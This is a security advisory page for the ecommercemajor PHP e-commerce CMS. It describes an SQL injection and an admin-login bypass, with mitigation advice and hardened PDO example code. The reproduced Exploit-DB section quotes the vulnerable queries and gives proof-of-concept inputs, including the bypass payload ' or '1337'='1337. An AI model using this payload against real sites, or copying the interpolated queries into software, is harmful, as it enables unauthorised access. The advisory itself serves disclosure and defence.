Vendor: ecommercemajor
By: Manish Kishan Tanwar
CVSS: 5.5 (MEDIUM)
SQL Injection and Authentication bypass
CWE: 89
Product Name: ecommercemajor
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2015

ecommercemajor ecommerce CMS SQL Injection and Authentication bypass

ecommercemajor is a PHP-based CMS for ecommerce portals. It is vulnerable to SQL injection in the 'product.php' file, where the 'productbycat' parameter is not properly filtered before being used in a SQL query. It is also vulnerable to authentication bypass in the 'index.php' file under the '__admin' directory, where the 'username' and 'password' parameters are not properly filtered before being used in a SQL query.

Mitigation:

To mitigate the SQL injection vulnerability, the application should use parameterized queries or prepared statements, so that user input is bound as data and never interpreted as part of the SQL statement. To mitigate the authentication bypass vulnerability, the application should properly validate and sanitize user input before using it in SQL queries.
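
The mitigation applied to the two queries quoted in the raw advisory below, as an added example (not code from ecommercemajor or from the advisory's author): both inputs are bound through PDO prepared statements. It assumes an in-memory SQLite database with constructed rows so that it runs offline, and that admin passwords are stored with password_hash() rather than as the plaintext the original query compares; the function names are hypothetical.

```php
<?php
// Added example: hardened forms of the two queries from the advisory.
// Table and column names follow the advisory; the rows are constructed samples.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE purchase (id INTEGER PRIMARY KEY, catid INTEGER, status TEXT, name TEXT)");
$db->exec("CREATE TABLE adminlogin (username TEXT PRIMARY KEY, password TEXT, adminname TEXT)");
$db->exec("INSERT INTO purchase (catid, status, name) VALUES (1,'enable','widget'), (2,'enable','gadget')");
$ins = $db->prepare("INSERT INTO adminlogin VALUES (?, ?, ?)");
// Assumption: the password column holds password_hash() output, not plaintext.
$ins->execute(['admin', password_hash('constructed-sample-pw', PASSWORD_DEFAULT), 'Site Admin']);

// product.php: catid is numeric, so validate it as an integer, then bind it.
function productsByCategory(PDO $db, $raw): array {
    $catid = filter_var($raw, FILTER_VALIDATE_INT);
    if ($catid === false) {
        return [];   // reject non-integer input instead of querying with it
    }
    $st = $db->prepare("SELECT * FROM purchase WHERE status = 'enable' AND catid = ? ORDER BY id DESC");
    $st->execute([$catid]);
    return $st->fetchAll(PDO::FETCH_ASSOC);
}

// __admin/index.php: fetch the row by bound username, then verify the hash in PHP.
function adminLogin(PDO $db, $username, $password): ?string {
    if (!is_string($username) || !is_string($password)) {
        return null;   // non-string input (e.g. arrays) is rejected outright
    }
    $st = $db->prepare("SELECT adminname, password FROM adminlogin WHERE username = ?");
    $st->execute([$username]);
    $row = $st->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password'])) {
        return null;   // unknown user or wrong password: no session is set
    }
    return $row['adminname'];
}

// The advisory's PoC values are passed in as plain data, followed by a valid login.
var_dump(productsByCategory($db, '1'));
var_dump(productsByCategory($db, 'SQLI'));
var_dump(adminLogin($db, "' or '1337'='1337", "' or '1337'='1337"));
var_dump(adminLogin($db, 'admin', 'constructed-sample-pw'));
```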

Exploit-DB raw data:

##################################################################################################
#Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass
#Author        : Manish Kishan Tanwar
#Home page Link : https://github.com/xlinkerz/ecommerceMajor
#Date          : 22/01/2015
#Discovered at : IndiShell Lab
#Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi
#email        : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////

ecommercemajor is a PHP-based CMS for ecommerce portals.

///////////////////////////////
// Vulnerability Description:
///////////////////////////////

SQL injection vulnerability:-
============================== 
In the file product.php, data from the GET parameter 'productbycat' is not filtered before being passed into the SQL query, which gives rise to a SQL injection vulnerability.
---------------------
$getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc";
---------------------
POC

http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI


Authentication Bypass:-
============================== 
The file index.php under the __admin directory has a SQL injection vulnerability.
The username and password parameters supplied via POST to check for a valid admin username and password are not filtered before being passed into the SQL query, which gives rise to an authentication bypass issue.
The vulnerable code is:
-------------------
if(isset($_POST[login]))
{
    // POST values are interpolated directly into the SQL string
    $check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'";
    $checkresult=mysql_query($check);
    $checkcount=mysql_num_rows($checkresult);
    // any returned row is treated as a successful login
    if($checkcount>0)
    {
        $checkrow=mysql_fetch_array($checkresult);
        $_SESSION[adminname]=$checkrow[adminname];
        $_SESSION[adminloginstatus]="success";
        echo "<script>window.location='home.php';</script>";
    }
}
--------------------
POC

open admin panel 
http://127.0.0.1/ecommercemajor/__admin/
username: ' or '1337'='1337
password: ' or '1337'='1337


